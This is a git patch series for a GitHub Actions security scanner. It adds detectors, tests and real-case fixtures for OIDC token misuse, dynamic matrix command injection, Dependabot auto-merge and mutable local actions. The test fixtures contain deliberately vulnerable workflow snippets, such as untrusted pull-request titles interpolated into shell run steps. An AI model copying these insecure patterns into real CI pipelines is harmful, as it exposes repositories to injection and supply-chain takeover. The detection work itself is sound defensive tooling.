!isUntrustedDynamicMatrixExpression(matrixExpression)) { + return; + } + if ( + isStaticFromJsonExpression(matrixExpression) && + !matrixExpression.includes("github.event.") + ) { + return; + } + + const hasAllowList = hasMatrixAllowListValidation(job.if); + const severity = hasAllowList ? "MEDIUM" : "HIGH"; + + const matrixEvidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["strategy:", "matrix:", "fromJSON", "github.event"], + fallbackValue: `${job.id} strategy.matrix is built from untrusted event data`, + }); + + findings.push({ + rule_id: "workflow-dynamic-matrix-injection", + finding_id: `WORKFLOW_DYNAMIC_MATRIX_INJECTION-${input.filePath}-${jobIndex}`, + severity, + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.strategy.matrix` }, + description: "Workflow strategy.matrix is derived from untrusted event payload content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid building strategy.matrix from attacker-controlled event fields", + "Use static allow-list matrices or validate and sanitize dynamic matrix payloads", + "Do not interpolate untrusted matrix values directly into shell commands", + ], + metadata: { + risk_tags: [hasAllowList ? "allow-list-guard" : "no-allow-list-guard"], + origin: "workflow-audit", + }, + evidence: matrixEvidence?.evidence ?? null, + suppressed: false, + }); + + job.steps.forEach((step, stepIndex) => { + if (!step.run || !MATRIX_REFERENCE_PATTERN.test(step.run)) { + return; + } + + const runEvidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run], + fallbackValue: `${job.id} run step interpolates matrix value in shell command`, + }); + + findings.push({ + rule_id: "workflow-dynamic-matrix-injection", + finding_id: `WORKFLOW_DYNAMIC_MATRIX_INJECTION_RUN-${input.filePath}-${jobIndex}-${stepIndex}`, + severity, + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Workflow run step interpolates dynamic matrix values sourced from untrusted event data", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Validate matrix values against explicit allow-lists before shell interpolation", + "Move untrusted values into strictly validated variables before command execution", + ], + metadata: { + risk_tags: [hasAllowList ? "allow-list-guard" : "no-allow-list-guard"], + origin: "workflow-audit", + }, + evidence: runEvidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-local-action-mutation.ts b/src/layer2-static/detectors/workflow-local-action-mutation.ts new file mode 100644 index 0000000..0bd892d --- /dev/null +++ b/src/layer2-static/detectors/workflow-local-action-mutation.ts @@ -0,0 +1,158 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowLocalActionMutationInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.values(value as Record).some((permission) => { + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function hasIdTokenWrite(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + const idTokenPermission = (value as Record)["id-token"]; + return ( + typeof idTokenPermission === "string" && idTokenPermission.trim().toLowerCase() === "write" + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +function isLocalUsesReference(value: string | undefined): boolean { + if (!value) { + return false; + } + const normalized = value.trim(); + return normalized.startsWith("./") || normalized.startsWith(".\\"); +} + +export function detectWorkflowLocalActionMutation( + input: WorkflowLocalActionMutationInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowPrivileged = + hasWritePermission(facts.workflowPermissions) || hasIdTokenWrite(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobPrivileged = + workflowPrivileged || + hasWritePermission(job.permissions) || + hasIdTokenWrite(job.permissions) || + hasInheritedSecrets(job.secrets); + const severity = jobPrivileged ? "HIGH" : "MEDIUM"; + + if (isLocalUsesReference(job.uses)) { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [job.uses ?? "", "uses: ./", "pull_request_target"], + fallbackValue: `${job.id} invokes local reusable workflow in untrusted context`, + }); + + findings.push({ + rule_id: "workflow-local-action-mutation", + finding_id: `WORKFLOW_LOCAL_ACTION_MUTATION-JOB-${input.filePath}-${jobIndex}`, + severity, + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.uses` }, + description: + "Untrusted workflow path executes a local reusable workflow reference that can be mutated by pull request content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-494", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid executing local reusable workflows from untrusted trigger contexts", + "Move privileged operations to immutable pinned actions or trusted workflow_call boundaries", + "Use read-only contexts when local action references are unavoidable", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + job.steps.forEach((step, stepIndex) => { + if (!isLocalUsesReference(step.uses)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.uses ?? "", "uses: ./", "pull_request_target"], + fallbackValue: `${job.id} executes mutable local action from untrusted context`, + }); + + findings.push({ + rule_id: "workflow-local-action-mutation", + finding_id: `WORKFLOW_LOCAL_ACTION_MUTATION-STEP-${input.filePath}-${jobIndex}-${stepIndex}`, + severity, + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + "Untrusted workflow path executes a local action reference that can be modified by the same pull request", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-494", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid local action execution in untrusted trigger workflows with privileged permissions", + "Pin to immutable third-party actions or split untrusted and privileged jobs", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts b/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts new file mode 100644 index 0000000..3fc26fa --- /dev/null +++ b/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts @@ -0,0 +1,207 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowOidcUntrustedContextInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const CLOUD_AUTH_ACTIONS = new Set([ + "aws-actions/configure-aws-credentials", + "azure/login", + "google-github-actions/auth", +]); + +const AUDIENCE_KEYS = new Set(["audience", "token_audience", "id_token_audience"]); + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.entries(value as Record).some(([key, permission]) => { + if (key.trim().toLowerCase() === "id-token") { + return false; + } + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function hasIdTokenWrite(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + const record = value as Record; + const idTokenPermission = record["id-token"]; + return ( + typeof idTokenPermission === "string" && idTokenPermission.trim().toLowerCase() === "write" + ); +} + +function normalizeUses(value: string | undefined): string | null { + if (!value) { + return null; + } + const normalized = value.trim().toLowerCase(); + if (normalized.length === 0) { + return null; + } + const atIndex = normalized.indexOf("@"); + return atIndex === -1 ? normalized : normalized.slice(0, atIndex); +} + +function hasCloudOidcAuthStep(jobSteps: Array<{ uses?: string }>): boolean { + return jobSteps.some((step) => { + const normalizedUses = normalizeUses(step.uses); + return normalizedUses ? CLOUD_AUTH_ACTIONS.has(normalizedUses) : false; + }); +} + +function hasAudienceConstraint(jobSteps: Array<{ with?: Record }>): boolean { + return jobSteps.some((step) => { + const withRecord = step.with; + if (!withRecord) { + return false; + } + + return Object.entries(withRecord).some(([key, value]) => { + if (!AUDIENCE_KEYS.has(key.trim().toLowerCase())) { + return false; + } + return value.trim().length > 0; + }); + }); +} + +function hasActorConstraint(condition: string): boolean { + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.actor") || + normalized.includes("github.triggering_actor") || + normalized.includes("github.event.pull_request.user.login") + ); +} + +function hasRepositoryOrRefConstraint(condition: string): boolean { + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.repository") || + normalized.includes("github.event.pull_request.head.repo.full_name") || + normalized.includes("github.event.pull_request.head.repo.fork") || + normalized.includes("github.ref") || + normalized.includes("github.base_ref") || + normalized.includes("github.event.pull_request.base.ref") + ); +} + +function hasStrictTrustChecks(condition: string | undefined): boolean { + if (!condition) { + return false; + } + return hasActorConstraint(condition) && hasRepositoryOrRefConstraint(condition); +} + +export function detectWorkflowOidcUntrustedContext( + input: WorkflowOidcUntrustedContextInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowHasIdTokenWrite = hasIdTokenWrite(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobHasIdTokenWrite = workflowHasIdTokenWrite || hasIdTokenWrite(job.permissions); + if (!jobHasIdTokenWrite) { + return; + } + + const strictTrustChecks = hasStrictTrustChecks(job.if); + const cloudAuthDetected = hasCloudOidcAuthStep(job.steps); + const hasAudience = hasAudienceConstraint(job.steps); + + if (strictTrustChecks && hasAudience) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "id-token: write", + "permissions", + "audience", + "github.actor", + "github.repository", + ], + fallbackValue: `${job.id} enables id-token write in untrusted trigger context`, + }); + + findings.push({ + rule_id: "workflow-oidc-untrusted-context", + finding_id: `WORKFLOW_OIDC_UNTRUSTED_CONTEXT-${input.filePath}-${jobIndex}`, + severity: + hasWritePermission(job.permissions) || hasWritePermission(facts.workflowPermissions) + ? "CRITICAL" + : "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.permissions.id-token` }, + description: + "Workflow enables OIDC token minting in an untrusted trigger context without strict trust boundaries", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-284", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Restrict id-token: write to trusted branches or trusted workflow_call boundaries", + "Require explicit actor and repository/ref checks on untrusted triggers", + cloudAuthDetected + ? "Configure explicit audience constraints for cloud authentication actions" + : "Add audience constraints and scoped trust conditions before minting OIDC tokens", + ], + metadata: { + risk_tags: [ + strictTrustChecks ? "strict-trust-checks" : "missing-strict-trust-checks", + hasAudience ? "audience-constrained" : "missing-audience-constraint", + cloudAuthDetected ? "cloud-auth-step" : "generic-oidc", + ], + origin: "workflow-audit", + }, + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 44de10a..5f440fd 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -45,6 +45,10 @@ import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-targ import { detectWorkflowArtifactTrustChain } from "./detectors/workflow-artifact-trust-chain.js"; import { detectWorkflowCallBoundary } from "./detectors/workflow-call-boundary.js"; import { detectWorkflowSecretExfiltration } from "./detectors/workflow-secret-exfiltration.js"; +import { detectWorkflowOidcUntrustedContext } from "./detectors/workflow-oidc-untrusted-context.js"; +import { detectWorkflowDynamicMatrixInjection } from "./detectors/workflow-dynamic-matrix-injection.js"; +import { detectDependabotAutoMerge } from "./detectors/dependabot-auto-merge.js"; +import { detectWorkflowLocalActionMutation } from "./detectors/workflow-local-action-mutation.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -696,6 +700,50 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-oidc-untrusted-context", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowOidcUntrustedContext({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-dynamic-matrix-injection", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowDynamicMatrixInjection({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-auto-merge", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectDependabotAutoMerge({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-local-action-mutation", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowLocalActionMutation({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/dependabot-auto-merge.test.ts b/tests/layer2/dependabot-auto-merge.test.ts new file mode 100644 index 0000000..ecf543e --- /dev/null +++ b/tests/layer2/dependabot-auto-merge.test.ts @@ -0,0 +1,62 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotAutoMerge } from "../../src/layer2-static/detectors/dependabot-auto-merge"; + +describe("dependabot auto merge detector", () => { + it("flags pull_request_target auto-merge flow gated only by dependabot actor", () => { + const findings = detectDependabotAutoMerge({ + filePath: ".github/workflows/automerge.yml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]'", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("dependabot-auto-merge"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag when strict repository boundary checks are present", () => { + const findings = detectDependabotAutoMerge({ + filePath: ".github/workflows/automerge.yml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-dynamic-matrix-injection.test.ts b/tests/layer2/workflow-dynamic-matrix-injection.test.ts new file mode 100644 index 0000000..1caf618 --- /dev/null +++ b/tests/layer2/workflow-dynamic-matrix-injection.test.ts @@ -0,0 +1,70 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowDynamicMatrixInjection } from "../../src/layer2-static/detectors/workflow-dynamic-matrix-injection"; + +describe("workflow dynamic matrix injection detector", () => { + it("flags dynamic matrix from untrusted event data that flows into shell execution", () => { + const findings = detectWorkflowDynamicMatrixInjection({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON(github.event.pull_request.title) }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: "${{ fromJSON(github.event.pull_request.title) }}", + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }); + + expect(findings.length).toBeGreaterThan(0); + expect(findings[0]?.rule_id).toBe("workflow-dynamic-matrix-injection"); + expect(findings.some((finding) => finding.location.field?.includes("strategy.matrix"))).toBe( + true, + ); + }); + + it("does not flag static matrix expressions", () => { + const findings = detectWorkflowDynamicMatrixInjection({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON('{"include":[{"command":"npm test"}]}') }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: '${{ fromJSON(\'{"include":[{"command":"npm test"}]}\') }}', + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-local-action-mutation.test.ts b/tests/layer2/workflow-local-action-mutation.test.ts new file mode 100644 index 0000000..c2bc949 --- /dev/null +++ b/tests/layer2/workflow-local-action-mutation.test.ts @@ -0,0 +1,68 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowLocalActionMutation } from "../../src/layer2-static/detectors/workflow-local-action-mutation"; + +describe("workflow local action mutation detector", () => { + it("flags local action usage in untrusted privileged workflow context", () => { + const findings = detectWorkflowLocalActionMutation({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-local-action-mutation"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag local action usage on trusted triggers", () => { + const findings = detectWorkflowLocalActionMutation({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["push"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-oidc-untrusted-context.test.ts b/tests/layer2/workflow-oidc-untrusted-context.test.ts new file mode 100644 index 0000000..98d973d --- /dev/null +++ b/tests/layer2/workflow-oidc-untrusted-context.test.ts @@ -0,0 +1,88 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowOidcUntrustedContext } from "../../src/layer2-static/detectors/workflow-oidc-untrusted-context"; + +describe("workflow oidc untrusted context detector", () => { + it("flags id-token write in untrusted trigger without strict trust checks or audience constraints", () => { + const findings = detectWorkflowOidcUntrustedContext({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy + aws-region: us-east-1 +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + "id-token": "write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + "aws-region": "us-east-1", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-oidc-untrusted-context"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag when strict actor/repository gating and audience constraints are present", () => { + const findings = detectWorkflowOidcUntrustedContext({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + if: github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy + audience: sts.amazonaws.com +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + if: "github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name", + permissions: { + "id-token": "write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + audience: "sts.amazonaws.com", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index 5951a59..df44502 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -198,4 +198,133 @@ jobs: const ruleIds = new Set(findings.map((finding) => finding.rule_id)); expect(ruleIds.has("workflow-secret-exfiltration")).toBe(true); }); + + it("surfaces remaining wave-f findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/oidc.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + "id-token": "write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + }, + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/matrix.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON(github.event.pull_request.title) }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: "${{ fromJSON(github.event.pull_request.title) }}", + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/dependabot-automerge.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]'", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/local-action.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-oidc-untrusted-context")).toBe(true); + expect(ruleIds.has("workflow-dynamic-matrix-injection")).toBe(true); + expect(ruleIds.has("dependabot-auto-merge")).toBe(true); + expect(ruleIds.has("workflow-local-action-mutation")).toBe(true); + }); }); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 76488ca..c199682 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -44,6 +44,10 @@ const expectedCheckedAuditIds = [ "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", "workflow-secret-exfiltration", + "workflow-oidc-untrusted-context", + "workflow-dynamic-matrix-injection", + "dependabot-auto-merge", + "workflow-local-action-mutation", ] as const; function readChecklist(): string { From e971c03e6b6f9a0dd48ac03f6c9f1409d0b48da7 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 15:06:16 +0000 Subject: [PATCH 5/6] test(workflow): expand wave-f real-case corpus --- docs/workflow-audit-real-cases.md | 44 +- .../.github/workflows/tests.yml | 509 +++++ .../workflows/runtime_build_and_test.yml | 933 ++++++++ .../.github/workflows/daily.yml | 1984 +++++++++++++++++ .../.github/workflows/db-pro.yaml | 133 ++ .../.github/workflows/frontend-lint.yml | 329 +++ .../workflows/dependabot-auto-merge.yml | 13 + .../.github/workflows/frontend-lint.yml | 329 +++ .../workflow-audits/real-cases/index.json | 42 + 9 files changed, 4315 insertions(+), 1 deletion(-) create mode 100644 test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml diff --git a/docs/workflow-audit-real-cases.md b/docs/workflow-audit-real-cases.md index 79d2ee3..ec479ac 100644 --- a/docs/workflow-audit-real-cases.md +++ b/docs/workflow-audit-real-cases.md @@ -37,6 +37,48 @@ Each fixture is commit-pinned to keep source provenance stable. - Source: - Local file: `test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml` +5. `RC-05-workflow-pr-target-checkout-head` + +- Expected rule: `workflow-pr-target-checkout-head` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml` + +6. `RC-06-workflow-artifact-trust-chain` + +- Expected rule: `workflow-artifact-trust-chain` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml` + +7. `RC-07-workflow-call-boundary` + +- Expected rule: `workflow-call-boundary` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml` + +8. `RC-08-workflow-secret-exfiltration` + +- Expected rule: `workflow-secret-exfiltration` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml` + +9. `RC-09-workflow-oidc-untrusted-context` + +- Expected rule: `workflow-oidc-untrusted-context` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml` + +10. `RC-10-dependabot-auto-merge` + +- Expected rule: `dependabot-auto-merge` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml` + +11. `RC-11-workflow-local-action-mutation` + +- Expected rule: `workflow-local-action-mutation` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml` + ## Validation Run targeted test: @@ -48,5 +90,5 @@ npm test -- tests/layer2/workflow-real-cases.test.ts Run CLI manually: ```bash -codegate scan test-fixtures/workflow-audits/real-cases/RC-02-obfuscation --workflow-audits --no-tui --format json +codegate scan test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain --workflow-audits --no-tui --format json ``` diff --git a/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml b/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml new file mode 100644 index 0000000..a8f3c17 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml @@ -0,0 +1,509 @@ +name: Tests + +on: + push: + branches: + - "**" + tags-ignore: + - "production-*" + pull_request_target: + +permissions: + contents: read + +concurrency: + group: ${{ github.workflow }}-${{ github.event_name == 'pull_request_target' && github.event.pull_request.number || github.ref }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' || github.ref != 'refs/heads/main' }} + +jobs: + ci_gate: + name: CI Gate${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + runs-on: ubicloud-standard-2 + environment: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name != github.repository && 'ci-protected' || '' }} + steps: + - run: true + + build_base: + name: Build base image${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + runs-on: ubicloud-standard-4 + needs: ci_gate + if: ${{ github.event_name != 'pull_request_target' || github.event.pull_request.head.repo.full_name != github.repository }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false 